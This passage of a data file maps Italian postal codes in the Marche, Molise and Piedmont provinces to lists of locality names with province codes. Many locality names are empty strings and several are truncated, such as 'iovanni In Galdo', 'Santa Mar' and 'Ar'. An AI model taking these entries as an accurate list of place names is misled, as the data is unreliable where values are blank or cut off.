[["Recanati", "MC"], ["Musone", "MC"]], "62020": [ ["", "MC"], ["Serrapetrona", "MC"], ["Caldarola", "MC"], ["", "MC"], ["Cessapalombo", "MC"], ["", "MC"], ["Gualdo", "MC"], ["", "MC"], ["", "MC"], ["", "MC"], ["Colmurano", "MC"], ["Valcimarra", "MC"], ["", "MC"], ], "62021": [["Frontale", "MC"], ["", "MC"], ["Apiro", "MC"]], "62022": [["Gagliole", "MC"], ["Castelraimondo", "MC"], ["Crispiero", "MC"]], "62024": [["Colferraio", "MC"], ["Esanatoglia", "MC"], ["Matelica", "MC"]], "62025": [ ["Seppio", "MC"], ["Massa", "MC"], ["Sefro", "MC"], ["Fiuminata", "MC"], ["Fonte Di Brescia", "MC"], ["Pioraco", "MC"], ], "62026": [["", "MC"], ["", "MC"], ["", "MC"]], "62027": [["", "MC"], ["Cesolo", "MC"], ["", "MC"]], "62028": [["Sarnano", "MC"]], "62029": [["Tolentino", "MC"]], "62032": [ ["", "MC"], ["Polverina", "MC"], ["Morro", "MC"], ["", "MC"], ["Mergnano", "MC"], ["Camerino", "MC"], ], "62034": [["Muccia", "MC"]], "62035": [ ["Pievebovigliana", "MC"], ["Acquacanina", "MC"], ["Fiordimonte", "MC"], ["Fiegni", "MC"], ["Bolognola", "MC"], ["Fiastra", "MC"], ], "62036": [ ["Casavecchia", "MC"], ["", "MC"], ["Pie' Casavecchia", "MC"], ["", "MC"], ["Appennino", "MC"], ], "62038": [["Serravalle Di Chienti", "MC"], ["Cesi", "MC"], ["C Macerata", "MC"]], "62039": [["Visso", "MC"], ["Ussita", "MC"], ["Castelsantange", "MC"], ["Fematre", "MC"]], "62100": [ ["", "MC"], ["", "MC"], ["Macerata", "MC"], ["Sforzacosta", "MC"], ["Corridonia Stazione", "MC"], ["Piediripa", "MC"], ], "61010": [ ["", "PU"], ["Case Bernardi", "PU"], ["", "PU"], ["", "PU"], ["", "PU"], ["Montegrimano", "PU"], ["Tavullia", "PU"], ["Padiglione", "PU"], ["Montelicciano", "PU"], ["", "PU"], ], "61011": [["", "PU"], ["Case Badioli", "PU"]], "61012": [["Fanano", "PU"], ["Gradara", "PU"]], "61013": [ ["", "PU"], ["Piandicastello", "PU"], ["", "PU"], ["", "PU"], ["Sassofeltrio", "PU"], ], "61014": [["", "PU"], ["Montecopiolo", "PU"], ["Villagrande", "PU"]], "61020": [ ["Casinina", "PU"], ["", "PU"], ["Gallo", "PU"], ["", "PU"], ["Petriano", "PU"], ["Ca' Gallo", "PU"], ["", "PU"], ["Tavoleto", "PU"], ], "61021": [["Frontino", "PU"], ["Carpegna", "PU"]], "61022": [ ["", "PU"], ["Vallefoglia", "PU"], ["Colbordolo", "PU"], ["Morciola", "PU"], ["Bottega", "PU"], ["Montecchio", "PU"], ], "61023": [["", "PU"], ["Pietrarubbia", "PU"]], "61024": [["Mombaroccio", "PU"], ["Monteciccardo", "PU"]], "61025": [["Montelabbate", "PU"], ["", "PU"]], "61026": [ ["Lunano", "PU"], ["", "PU"], ["Monastero", "PU"], ["Piandimeleto", "PU"], ["", "PU"], ], "61028": [["Caprazzino", "PU"], ["Mercatale", "PU"], ["Sassocorvaro", "PU"], ["Auditore", "PU"]], "61029": [ ["", "PU"], ["Schieti", "PU"], ["Gadana", "PU"], ["Trasanni", "PU"], ["", "PU"], ["Urbino", "PU"], ["", "PU"], ["Castelcavallino", "PU"], ["", "PU"], ["Canavaccio", "PU"], ], "61030": [ ["Serrungarina", "PU"], ["", "PU"], ["Calcinelli", "PU"], ["Cartoceto", "PU"], ["", "PU"], ["Tavernelle", "PU"], ["", "PU"], ["Monteguiduccio", "PU"], ["Villanova", "PU"], ["Piagge", "PU"], ["Saltara", "PU"], ["Montefelcino", "PU"], ["Lucrezia", "PU"], ], "61032": [["Fenile", "PU"], ["Cuccurano", "PU"], ["Bellocchi", "PU"], ["Fano", "PU"]], "61033": [["Fermignano", "PU"]], "61034": [["", "PU"], ["Calmazzo", "PU"], ["Fossombrone", "PU"]], "61037": [["Marotta", "PU"], ["Mondolfo", "PU"], ["Centocroci", "PU"]], "61038": [["", "PU"]], "61039": [["", "PU"], ["Cerasa", "PU"]], "61040": [ ["", "PU"], ["Sant'Ippolito", "PU"], ["", "PU"], ["", "PU"], ["", "PU"], ["Mondavio", "PU"], ["", "PU"], ["", "PU"], ["", "PU"], ["Frontone", "PU"], ["Lamoli", "PU"], ["", "PU"], ["Sorbolongo", "PU"], ["Castelvecchio", "PU"], ["Barchi", "PU"], ], "61041": [ ["Acqualagna", "PU"], ["", "PU"], ["Furlo", "PU"], ["Petriccio", "PU"], ["Pole", "PU"], ["Bellaria", "PU"], ], "61042": [["Apecchio", "PU"], ["", "PU"]], "61043": [ ["Secchiano", "PU"], ["", "PU"], ["Smirra", "PU"], ["Pianello", "PU"], ["Cagli", "PU"], ], "61044": [["Pontericcioli", "PU"], ["Chiaserna", "PU"], ["Cantiano", "PU"]], "61045": [["", "PU"], ["Monterolo", "PU"], ["Pergola", "PU"]], "61046": [["Piobbico", "PU"]], "61047": [["San Lorenzo In Campo", "PU"], ["San Vito Sul Cesano", "PU"]], "61048": [["Sant'Angelo In Vado", "PU"]], "61049": [["Muraglione", "PU"], ["Urbania", "PU"]], "61100": [ ["", "PU"], ["Novilara", "PU"], ["", "PU"], ["Muraglia", "PU"], ["", "PU"], ["", "PU"], ["Montegranaro", "PU"], ["Candelara", "PU"], ["Soria", "PU"], ["Pantano", "PU"], ["", "PU"], ["San Pietro In Calibano", "PU"], ["Pesaro", "PU"], ["Santa Mar", "PU"], ["", "PU"], ["Case Bruciate", "PU"], ["Santa Veneranda", "PU"], ["Cattabrighe", "PU"], ["", "PU"], ["Ginestreto", "PU"], ], "61121": [["Pesaro", "PU"]], "61122": [["Pesaro", "PU"]], "86010": [ ["Campodipietra", "CB"], ["iovanni In Galdo", "CB"], ["San Giuliano Del Sannio", "CB"], ["Casalciprano", "CB"], ["Busso", "CB"], ["Tufara", "CB"], ["", "CB"], ["Castropignano", "CB"], ["Ferrazzano", "CB"], ["Oratino", "CB"], ["Roccaspromonte", "CB"], ["Cercepiccola", "CB"], ["Gildone", "CB"], ], "86011": [["Baranello", "CB"]], "86012": [["Cercemaggiore", "CB"]], "86013": [["Gambatesa", "CB"]], "86014": [["Guardiaregia", "CB"]], "86015": [["Jelsi", "CB"]], "86016": [["Riccia", "CB"]], "86017": [["Sepino", "CB"]], "86018": [["Toro", "CB"]], "86019": [["Vinchiaturo", "CB"]], "86020": [ ["Campochiaro", "CB"], ["", "CB"], ["Duronia", "CB"], ["Pietracupa", "CB"], ["", "CB"], ["", "CB"], ["Molise", "CB"], ["Roccavivara", "CB"], ["", "CB"], ["Fossalto", "CB"], ["Spinete", "CB"], ["", "CB"], ], "86021": [ ["Castellone", "CB"], ["Bojano", "CB"], ["Monteverde", "CB"], ["", "CB"], ["", "CB"], ], "86022": [["Limosano", "CB"]], "86023": [["Montagano", "CB"]], "86024": [["", "CB"]], "86025": [["Ripalimosani", "CB"]], "86026": [["Salcito", "CB"]], "86027": [["", "CB"]], "86028": [["", "CB"]], "86029": [["Trivento", "CB"]], "86030": [ ["Castelbottaccio", "CB"], ["Civitacampomarano", "CB"], ["Mafalda", "CB"], ["Lucito", "CB"], ["", "CB"], ["Lupara", "CB"], ["", "CB"], ["Tavenna", "CB"], ["Guardialfiera", "CB"], ["", "CB"], ["Montemitro", "CB"], ["Matrice", "CB"], ], "86031": [["Castelmauro", "CB"]], "86032": [["Montecilfone", "CB"]], "86033": [["", "CB"]], "86034": [["Guglionesi", "CB"]], "86035": [["Larino", "CB"]], "86036": [["", "CB"]], "86037": [["Palata", "CB"]], "86038": [["Collecalcioni", "CB"], ["Petacciato", "CB"]], "86039": [["Termoli", "CB"]], "86040": [ ["Ripabottoni", "CB"], ["Montelongo", "CB"], ["", "CB"], ["Campolieto", "CB"], ["", "CB"], ["", "CB"], ["", "CB"], ["", "CB"], ["Pietracatella", "CB"], ["Monacilioni", "CB"], ["Provvidenti", "CB"], ["Rotello", "CB"], ], "86041": [["Bonefro", "CB"]], "86042": [["Nuova Cliternia", "CB"], ["Campomarino", "CB"], ["", "CB"]], "86043": [["Casacalenda", "CB"]], "86044": [["Colletorto", "CB"]], "86045": [["Portocannone", "CB"]], "86046": [["San Martino In Pensilis", "CB"]], "86047": [["Santa ", "CB"]], "86048": [["", "CB"]], "86049": [["Ururi", "CB"]], "86100": [["", "CB"], ["Campobasso", "CB"], ["S", "CB"]], "86070": [ ["", "IS"], ["Scapoli", "IS"], ["Sant'Agapito", "IS"], ["", "IS"], ["", "IS"], ["", "IS"], ["", "IS"], ["Roccaravindola", "IS"], ["R", "IS"], ["Montaquila", "IS"], ["Rocchetta A Volturno", "IS"], ["Con", "IS"], ["Fornelli", "IS"], ], "86071": [["Pizzone", "IS"], ["", "IS"]], "86072": [["Cerro Al Volturno", "IS"], ["Cupone", "IS"]], "86073": [["", "IS"]], "86074": [["Cerasuolo", "IS"], ["Filignano", "IS"]], "86075": [["Monteroduni", "IS"], ["Sant'Eusanio", "IS"]], "86077": [["", "IS"], ["Pozzilli", "IS"]], "86078": [ ["Roccapipirozzi", "IS"], ["", "IS"], ["Selvotta", "IS"], ["Campopino", "IS"], ["Pianura", "IS"], ], "86079": [["Ceppagna", "IS"], ["Venafro", "IS"]], "86080": [ ["", "IS"], ["", "IS"], ["Roccasicura", "IS"], ["", "IS"], ["Miranda", "IS"], ["", "IS"], ["Castelverrino", "IS"], ["Pescopennataro", "IS"], ["", "IS"], ], "86081": [["Agnone", "IS"], ["V", "IS"]], "86082": [["Capracotta", "IS"]], "86083": [["Castiglione", "IS"], ["Carovilli", "IS"]], "86084": [["Vandra", "IS"], ["", "IS"]], "86085": [["Pietrabbondante", "IS"]], "86086": [["", "IS"]], "86087": [["", "IS"]], "86088": [["", "IS"]], "86089": [["Vastogirardi", "IS"], ["Cerreto", "IS"], ["", "IS"]], "86090": [ ["", "IS"], ["Pastena", "IS"], ["Longano", "IS"], ["Guasto", "IS"], ["Indiprete", "IS"], ["Pesche", "IS"], ["Castelpetroso", "IS"], ["Castelpizzuto", "IS"], ], "86091": [["", "IS"]], "86092": [["Roccamandolfi", "IS"], ["", "IS"]], "86093": [["Carpinone", "IS"]], "86094": [["", "IS"]], "86095": [["Frosolone", "IS"], ["", "IS"], ["", "IS"]], "86096": [ ["", "IS"], ["Macchiagodena", "IS"], ["Incoronata", "IS"], ["", "IS"], ], "86097": [["", "IS"], ["Pescolanciano", "IS"], ["Chiauci", "IS"]], "86170": [["Miranda", "IS"], ["Castelromano", "IS"], ["Isernia", "IS"]], "15010": [ ["Grognardo", "AL"], ["", "AL"], ["Merana", "AL"], ["Visone", "AL"], ["", "AL"], ["Ponti", "AL"], ["Pareto", "AL"], ["Prasco", "AL"], ["", "AL"], ["Ricaldone", "AL"], ["", "AL"], ["Terzo", "AL"], ["Cavatore", "AL"], ["Morbello", "AL"], ["", "AL"], ["Melazzo", "AL"], ["Frascaro", "AL"], ["Morsasco", "AL"], ["Ponzone", "AL"], ["Denice", "AL"], ["Cremolino", "AL"], ["", "AL"], ["Gamalero", "AL"], ["", "AL"], ], "15011": [["Moirano", "AL"], ["", "AL"]], "15012": [["Bistagno", "AL"]], "15013": [["", "AL"]], "15014": [["Cantalupo", "AL"]], "15015": [["Cartosio", "AL"], ["Malvicino", "AL"]], "15016": [["Cassine", "AL"], ["Caranzano", "AL"], ["Gavonata", "AL"]], "15017": [["", "AL"]], "15018": [["", "AL"]], "15019": [["Strevi", "AL"]], "15020": [ ["Gabiano", "AL"], ["", "AL"], ["Villamiroglio", "AL"], ["", "AL"], ["", "AL"], ["Zanco", "AL"], ["Casalbagliano", "AL"], ["", "AL"], ["", "AL"], ["", "AL"], ["Lussello", "AL"], ["Montalero", "AL"], ["Brusaschetto", "AL"], ["", "AL"], ["", "AL"], ["Varengo", "AL"], ["", "AL"], ["", "AL"], ["Cereseto", "AL"], ["", "AL"], ["Moncestino", "AL"], ["Murisengo", "AL"], ["Pozzengo", "AL"], ["Camino", "AL"], ["", "AL"], ["Solonghello", "AL"], ["", "AL"], ["Vallegioliti", "AL"], ["Cantavenna", "AL"], ["", "AL"], ["Villadeati", "AL"], ], "15021": [["Cardona", "AL"], ["", "AL"], ["Sanico", "AL"]], "15022": [["Bergamasco", "AL"]], "15023": [["Felizzano", "AL"]], "15024": [["Abbazia", "AL"], ["Masio", "AL"]], "15025": [["", "AL"]], "15026": [["Oviglio", "AL"], ["Carentino", "AL"]], "15027": [["Pontestura", "AL"]], "15028": [["Piepasso", "AL"], ["Quattordio", "AL"]], "15029": [["Solero", "AL"]], "15030": [ ["", "AL"], ["Terruggia", "AL"], ["Stevani", "AL"], ["Treville", "AL"], ["", "AL"], ["", "AL"], ["", "AL"], ["", "AL"], ["Conzano", "AL"], ["", "AL"], ["Olivola", "AL"], ["Coniolo", "AL"], ], "15031": [["Balzola", "AL"]], "15032": [["", "AL"]], "15033": [ ["Terranova", "AL"], ["", "AL"], ["", "AL"], ["", "AL"], ["Popolo", "AL"], ["", "AL"], ["Roncaglia", "AL"], ["", "AL"], ], "15034": [["", "AL"]], "15035": [["", "AL"]], "15036": [["Giarole", "AL"]], "15037": [["Lu", "AL"], ["", "AL"]], "15038": [["Ottiglio", "AL"]], "15039": [["", "AL"]], "15040": [ ["Valmadonna", "AL"], ["", "AL"], ["Rivarone", "AL"], ["", "AL"], ["Bozzole", "AL"], ["", "AL"], ["", "AL"], ["", "AL"], ["Ticineto", "AL"], ["", "AL"], ["Piovera", "AL"], ["Occimiano", "AL"], ["", "AL"], ["Valmacca", "AL"], ["", "AL"], ["Giardinetto", "AL"], ["Montecastello", "AL"], ["", "AL"], ["Grava", "AL"], ["'", "AL"], ], "15041": [["Franchini", "AL"], ["", "AL"]], "15042": [["Bassignana", "AL"], ["Mugarone", "AL"], ["Fiondi", "AL"]], "15043": [["Fubine", "AL"]], "15044": [["Quargnento", "AL"]], "15045": [["Sale", "AL"]], "15046": [["", "AL"]], "15048": [["Valenza", "AL"], ["Monte", "AL"], ["Villabella", "AL"]], "15049": [["", "AL"]], "15050": [ ["Guazzora", "AL"], ["Montacuto", "AL"], ["Casasco", "AL"], ["Montemarzino", "AL"], ["Sarezzano", "AL"], ["", "AL"], ["", "AL"], ["", "AL"], ["Momperone", "AL"], ["Avolasca", "AL"], ["Villaromagnano", "AL"], ["Volpeglino", "AL"], ["", "AL"], ["", "AL"], ["Carbonara Scrivia", "AL"], ["Alzano Scrivia", "AL"], ["", "AL"], ["Montegioco", "AL"], ["", "AL"], ["Spineto Scrivia", "AL"], ["Villalvernia", "AL"], ["", "AL"], ["Garbagna", "AL"], ["Paderna", "AL"], ["", "AL"], ], "15051": [["Carezzano", "AL"], ["Castellania", "AL"]], "15052": [["Casalnoceto", "AL"]], "15053": [["Castelnuovo Scrivia", "AL"]], "15054": [["", "AL"], ["Caldirola", "AL"], ["Garadassi", "AL"]], "15055": [["Pontecurone", "AL"]], "15056": [["", "AL"], ["Gremiasco", "AL"], ["Dernice", "AL"]], "15057": [ ["Passalacqua", "AL"], ["Tortona", "AL"], ["", "AL"], ["", "AL"], ["", "AL"], ], "15058": [["Viguzzolo", "AL"]], "15059": [["Volpedo", "AL"], ["Monleale", "AL"]], "15060": [ ["", "AL"], ["", "AL"], ["", "AL"], ["Cuquello", "AL"], ["", "AL"], ["Carrosio", "AL"], ["", "AL"], ["Persi", "AL"], ["", "AL"], ["Sardigliano", "AL"], ["Basaluzzo", "AL"], ["", "AL"], ["Castagnola", "AL"], ["", "AL"], ["", "AL"], ["", "AL"], ["Grondona", "AL"], ["", "AL"], ["Voltaggio", "AL"], ["Montaldeo", "AL"], ["", "AL"], ["", "AL"], ["", "AL"], ["", "AL"], ["", "AL"], ["Tassarolo", "AL"], ["", "AL"], ["Stazzano", "AL"], ["Pasturana", "AL"], ["Fraconalto", "AL"], ["Bosio", "AL"], ["", "AL"], ], "15061": [["Ar", "AL"]], "15062": [["Donna", "AL"], ["", "AL"], ["Pollastra", "AL"]], "15063": [["", "AL"], ["Gavazzana", "AL"]], "15064": [["Fresonara", "AL"]], "15065": [["Frugarolo", "AL"]], "15066": [["Gavi", "AL"]], "15067": [["", "AL"], ["Merella", "AL"]], "15068": [["", "AL"]], "15069": [["S", "AL"]], "15070": [ ["Castelspina", "AL"], ["Cassinelle", "AL"], ["", "AL"], ["Lerma", "AL"], ["", "AL"], ["Mongiardino", "AL"], ["Trisobbio", "AL"], ["Bandita", "AL"], ["", "AL"], ["", "AL"], ], "15071": [["Carpeneto", "AL"]], "15072": [["Portanova", "AL"], ["", "AL"]], "15073": [["", "AL"]], "15074": [["Molare", "AL"]], "15075": [["Mornese", "AL"]], "15076": [["Gnocchetto", "AL"], ["Ovada", "AL"]], "15077": [["Predosa", "AL"], ["Castelferro", "AL"]], "15078": [["", "AL"]], "15079": [["Sezzadio", "AL"]], "15100": [ ["", "AL"], ["", "AL"], ["Cascinagrossa", "AL"], ["", "AL"], ["Alessandria", "AL"], ["Lobbi", "AL"], ["Castelceriolo", "AL"], ["Orti", "AL"], ["", "AL"], ["Cristo", "AL"], ["Mandrogne", "AL"], ], "15121": [["Alessandria", "AL"]], "14010": [ ["Cantarana", "AT"], ["", "AT"], ["Dusino", "AT"], ["Antignano", "AT"], ["", "AT"], ["", "AT"], ["", "AT"], ["", "AT"], ["Viale", "AT"], ["", "AT"], ["Cellarengo", "AT"], ["Cortazzone", "AT"], ["", "AT"], ["", "AT"], ], "14011": [["", "AT"]], "14012": [["Ferrere", "AT"]], "14013": [["Castellero", "AT"], ["Monale", "AT"], ["Cortandone", "AT"]], "14014": [["Montafia", "AT"], ["Capriglio", "AT"]], "14015": [["", "AT"], ["", "AT"]], "14016": [["Pratomorone", "AT"], ["Tigliole", "AT"]], "14017": [["Valfenera", "AT"]], "14018": [["Roatto", "AT"], ["Maretto", "AT"], ["", "AT"]], "14019": [["'", "AT"], ["'Asti", "AT"]], "14020": [ ["Robella", "AT"], ["", "AT"], ["Passerano", "AT"], ["Schierano", "AT"], ["Cinaglio", "AT"], ["Marmorito", "AT"], ["Cortanze", "AT"], ["", "AT"], ["", "AT"], ["", "AT"], ["Settime", "AT"], ["", "AT"], ["", "AT"], ["Aramengo", "AT"], ["Cossombrato", "AT"], ["Piea", "AT"], ["Soglio", "AT"], ["", "AT"], ["Corsione", "AT"], ], "14021": [["", "AT"]], "14022": [ ["Becchi", "AT"], ["", "AT"], ["Albugnano", "AT"], ["Castelnuovo ", "AT"], ], "14023": [ ["", "AT"], ["Tonengo", "AT"], ["Cocconito", "AT"], ["Cocconato", "AT"], ["Moransengo", "AT"], ], "14024": [["", "AT"]], "14025": [["", "AT"], ["", "AT"]], "14026": [ ["Montiglio", "AT"], ["Scandeluzza", "AT"], ["Cunico", "AT"], ["Colcavagno", "AT"], ["", "AT"], ["", "AT"], ], "14030": [ ["Refrancore", "AT"], ["", "AT"], ["Valenzani", "AT"], ["Accorneri", "AT"], ["Montemagno", "AT"], ["Frinco", "AT"], ["Scurzolengo", "AT"], ["", "AT"], ["", "AT"], ["Viarigi", "AT"], ["", "AT"], ["Penango", "AT"], ["", "AT"], ], "14031": [["", "AT"], ["Calliano", "AT"], ["Grana", "AT"]], "14032": [["Casorzo", "AT"]], "14033": [["Callianetto", "AT"], ["", "AT"], ["Castell'Alfero", "AT"]], "14034": [["", "AT"], ["Monfallito", "AT"]], "14035": [["", "AT"]], "14036": [["Moncalvo", "AT"]], "14037": [["", "AT"], ["Portacomaro", "AT"], ["Migliandolo", "AT"]], "14039": [["Tonco", "AT"]], "14040": [ ["Cortiglione", "AT"], ["Quaranti", "AT"], ["", "AT"], ["", "AT"], ["", "AT"], ["Vinchio", "AT"], ["Mongardino", "AT"], ["Montabone", "AT"], ["", "AT"], ["Belveglio", "AT"], ["Maranzana", "AT"], ], "14041": [["Agliano", "AT"], ["", "AT"]], "14042": [["", "AT"], ["Calamandrana", "AT"]], "14043": [["", "AT"]], "14044": [["", "AT"], ["Fontanile", "AT"]], "14045": [["Ghiare", "AT"], ["", "AT"], ["Madonna", "AT"]], "14046": [["Bazzana", "AT"], ["Bruno", "AT"], ["Mombaruzzo", "AT"]], "14047": [["Mombercelli", "AT"]], "14048": [["", "AT"], ["", "AT"], ["", "AT"]], "14049": [["", "AT"], ["", "AT"]], "14050": [ ["Cessole", "AT"], ["", "AT"], ["Mombaldone", "AT"], ["", "AT"], ["Serole", "AT"], ["Moasca", "AT"], ["Roccaverano", "AT"], ["", "AT"], ["Cassinasco", "AT"], ], "14051": [["Loazzolo", "AT"], ["Bubbio", "AT"]], "14052": [["Calosso", "AT"]], "14053": [ ["", "AT"], ["Canelli", "AT"], ["Sant'Antonio", "AT"], ["", "AT"], ], "14054": [ ["Coazzolo", "AT"], ["", "AT"], ["", "AT"], ["", "AT"], ["Olmo", "AT"], ], "14055": [["", "AT"], ["Motta", "AT"], ["Boglietto", "AT"]], "14057": [["", "AT"], ["Piano", "AT"], ["", "AT"]], "14058": [["", "AT"], ["Sessame", "AT"]], "14059": [["", "AT"], ["Vesime", "AT"]], "14100": [ ["", "AT"], ["Serravalle", "AT"], ["Montemarzo", "AT"], ["Valletanaro", "AT"], ["Viatosto", "AT"], ["", "AT"], ["", "AT"], ["Montegrosso", "AT"], ["", "AT"], ["Valleandona", "AT"], ["Sessant", "AT"], ["Valgera", "AT"], ["Variglie", "AT"], ["Mombarone", "AT"], ["", "AT"], ["Asti", "AT"], ["Vaglierano", "AT"], ["Castiglione", "AT"], ["Casabianca", "AT"], ["", "AT"], ["Revignano", "AT"], ], "13811": [["Tavigliano", "BI"], ["", "BI"]], "13812": [ ["", "BI"], ["Quittengo", "BI"], ["", "BI"], ["Balma", "BI"], ["Montesinaro", "BI"], ["Piedicavallo", "BI"], ["", "BI"], ], "13814": [["Pollone", "BI"]], "13815": [["Rosazza", "BI"]], "13816": [["Miagliano", "BI"], ["", "BI"]], "13817": [["Sordevolo", "BI"]], "13818": [["Tollegno", "BI"]], "13821": [["Pianezze", "BI"], ["Callabiana", "BI"], ["Camandona", "BI"]], "13822": [["Pistolesa", "BI"]], "13823": [["", "BI"], ["Strona", "BI"]], "13824": [["Veglio", "BI"]], "13825": [["Crocemosso", "BI"], ["Campore", "BI"]], "13831": [["", "BI"]], "13833": [["Portula", "BI"]], "13835": [ ["Bulliana", "BI"], ["Soprana", "BI"], ["Ponzone", "BI"], ["", "BI"], ["Mosso", "BI"], ["Vico", "BI"], ["Trivero", "BI"], ["Botto", "BI"], ["Pratrivero", "BI"], ["Giardino", "BI"], ], "13836": [["", "BI"], ["Castellengo", "BI"], ["Aglietti", "BI"], ["Cossato", "BI"]], "13841": [["", "BI"], ["Bioglio", "BI"]], "13843": [["Pettinengo", "BI"], ["Vaglio", "BI"]], "13844": [["Piatto", "BI"], ["Ternengo", "BI"]], "13845": [["", "BI"]], "13847": [["Vallanzengo", "BI"], ["", "BI"]], "13848": [["Zumaglia", "BI"]], "13851": [["", "BI"]], "13853": [["Capovilla", "BI"], ["Castello", "BI"], ["Lessona", "BI"], ["Crosa", "BI"]], "13854": [["", "BI"], ["Quaregna", "BI"]], "13855": [["Valdengo", "BI"]], "13856": [["", "BI"], ["Villaggi", "BI"]], "13861": [["Ailoche", "BI"]], "13862": [["Brusnengo", "BI"]], "13863": [["Coggiola", "BI"]], "13864": [["Crevacuore", "BI"], ["Caprile", "BI"]], "13865": [["Curino", "BI"]], "13866": [["Casapinta", "BI"], ["Masserano", "BI"]], "13867": [["Flecchia", "BI"], ["Pray", "BI"], ["", "BI"]], "13868": [["Sostegno", "BI"], ["", "BI"]], "13871": [["Verrone", "BI"], ["Benna", "BI"]], "13872": [["Borriana", "BI"]], "13873": [["Massazza", "BI"]], "13874": [["Mottalciata", "BI"], ["Gifflenga", "BI"]], "13875": [["Ponderano", "BI"]], "13876": [["Sandigliano", "BI"]], "13877": [["", "BI"]], "13878": [["Candelo", "BI"]], "13881": [["Cavaglia'", "BI"], ["Dorzano", "BI"]], "13882": [["Cerrione", "BI"], ["Vergnasco", "BI"], ["Magnonevolo", "BI"]], "13883": [["Roppolo", "BI"]], "13884": [["Torrazzo", "BI"], ["", "BI"]], "13885": [["Brianco", "BI"], ["Salussola", "BI"], ["Vigellio", "BI"]], "13886": [["Viverone", "BI"]], "13887": [["Zimone", "BI"], ["Magnano", "BI"]], "13888": [["Mongrando", "BI"], ["Ceresane", "BI"], ["Curanuova", "BI"], ["Zubiena", "BI"]], "13891": [["Camburzano", "BI"]], "13893": [["Donato", "BI"]], "13894": [["Gaglianico", "BI"]], "13895": [["Graglia", "BI"], ["Muzzano", "BI"], ["", "BI"], ["", "BI"]], "13896": [["Netro", "BI"]], "13897": [["Occhieppo Inferiore", "BI"]], "13898": [["Occhieppo Superiore", "BI"]], "13899": [["Pralungo", "BI"]], "13900": [ ["Chiavazza", "BI"], ["Oropa", "BI"], ["Pavignano", "BI"], ["Biella", "BI"], ["Barazzetto", "BI"], ["Cossila", "BI"], ["Vandorno", "BI"], ["Favaro", "BI"], ], "12010": [ ["Argentera", "CN"], ["Roccasparvera", "CN"], ["Rittana", "CN"], ["Valdieri", "CN"], ["Bersezio", "CN"], ["Moiola", "CN"], ["Pianche", "CN"], ["Bernezzo", "CN"], ["Santa Croce Cervasca", "CN"], ["Aisone", "CN"], ["Santa Croce", "CN"], ["Andonno", "CN"], ["Gaiola", "CN"], ["", "CN"], ["Vignolo", "CN"], ["San Defendente", "CN"], ["Valloriate", "CN"], ["Cervasca", "CN"], ["Entracque", "CN"], ["Vinadio", "CN"], ["", "CN"], ["Sant'Anna", "CN"], ["Pietraporzio", "CN"], ["Roaschia", "CN"], ["Sambuco", "CN"], ["San Rocco Di Bernezzo", "CN"], ], "12011": [["", "CN"], ["", "CN"], ["", "CN"]], "12012": [ ["Boves", "CN"], ["Cerati", "CN"], ["Fontanelle", "CN"], ["Mellana", "CN"], ["San Giacomo", "CN"], ["Rivoira", "CN"], ["San Giacomo Di Boves", "CN"], ], "12013": [["", "CN"], ["San Bartolomeo", "CN"]], "12014": [["Festiona", "CN"], ["Demonte", "CN"]], "12015": [["", "CN"]], "12016": [["Peveragno", "CN"], ["", "CN"], ["", "CN"]], "12017": [["Robilante", "CN"]], "12018": [["Brignola", "CN"], ["Roccavione", "CN"], ["", "CN"]], "12019": [["Vernante", "CN"]], "12020": [ ["Casteldelfino", "CN"], ["Monsola", "CN"], ["Elva", "CN"], ["Roccabruna", "CN"], ["Sampeyre", "CN"], ["", "CN"], ["Marmora", "CN"], ["Frassino", "CN"], ["Venasca", "CN"], ["", "CN"], ["Lemma", "CN"], ["Canosio", "CN"], ["Macra", "CN"], ["Melle", "CN"], ["Brossasco", "CN"], ["Rore", "CN"], ["Valgrana", "CN"], ["Pontechianale", "CN"], ["Villar", "CN"], ["", "CN"], ["Stroppo", "CN"], ["Isasca", "CN"], ["Vottignasco", "CN"], ["Castelmagno", "CN"], ["Cartignano", "CN"], ["Villafalletto", "CN"], ["Bellino", "CN"], ["", "CN"], ["", "CN"], ["", "CN"], ["Rossana", "CN"], ["Tarantasca", "CN"], ], "12021": [["Acceglio", "CN"]], "12022": [["", "CN"], ["Valmala", "CN"], ["Busca", "CN"], ["", "CN"]], "12023": [["Caraglio", "CN"]], "12024": [["", "CN"]], "12025": [["", "CN"], ["Dronero", "CN"]], "12026": [["Piasco", "CN"]], "12027": [["Pradleves", "CN"]], "12028": [["", "CN"], ["Prazzo", "CN"]], "12029": [["Lottulo", "CN"], ["", "CN"]], "12030": [ ["Scarnafigi", "CN"], ["", "CN"], ["Envie", "CN"], ["Rifreddo", "CN"], ["Cavallermaggiore", "CN"], ["Gambasca", "CN"], ["", "CN"], ["Marene", "CN"], ["Lagnasco", "CN"], ["", "CN"], ["Faule", "CN"], ["Murello", "CN"], ["Ostana", "CN"], ["Pagno", "CN"], ["Manta", "CN"], ["Oncino", "CN"], ["", "CN"], ["", "CN"], ["Brondello", "CN"], ["Sanfront", "CN"], ["Polonghera", "CN"], ["Casalgrasso", "CN"], ["Crissolo", "CN"], ["", "CN"], ["Cavallerleone", "CN"], ["Carde'", "CN"], ["Ruffia", "CN"], ["", "CN"], ], "12031": [["", "CN"]], "12032": [["Galleane", "CN"], ["Barge", "CN"]], "12033": [["Moretta", "CN"]], "12034": [["Paesana", "CN"]], "12035": [["Racconigi", "CN"]], "12036": [["Staffarda", "CN"], ["Revello", "CN"]], "12037": [ ["Cervignasco", "CN"], ["Saluzzo", "CN"], ["", "CN"], ["", "CN"], ["Castellar", "CN"], ["", "CN"], ], "12038": [["Savigliano", "CN"], ["Levaldigi", "CN"]], "12039": [["Verzuolo", "CN"], ["Villanovetta", "CN"], ["Falicetto", "CN"]], "12040": [ ["", "CN"], ["Morozzo", "CN"], ["", "CN"], ["Genola", "CN"], ["", "CN"], ["", "CN"], ["Cervere", "CN"], ["", "CN"], ["Priocca", "CN"], ["Canove", "CN"], ["", "CN"], ["", "CN"], ["", "CN"], ["Margarita", "CN"], ["Montanera", "CN"], ["Govone", "CN"], ["", "CN"], ["Trucchi", "CN"], ["", "CN"], ["Sanfre'", "CN"], ["", "CN"], ["", "CN"], ["", "CN"], ["Salmour", "CN"], ], "12041": [["", "CN"], ["Isola", "CN"], ["agienna", "CN"]], "12042": [["Bandito", "CN"], ["Bra", "CN"], ["Pollenzo", "CN"]], "12043": [["Canale", "CN"], ["Valpone", "CN"]], "12044": [["", "CN"], ["", "CN"], ["Centallo", "CN"]], "12045": [ ["Piovani", "CN"], ["Murazzo", "CN"], ["Gerbo", "CN"], ["unia", "CN"], ["San Sebastiano", "CN"], ["Tagliata", "CN"], ["San Vittore", "CN"], 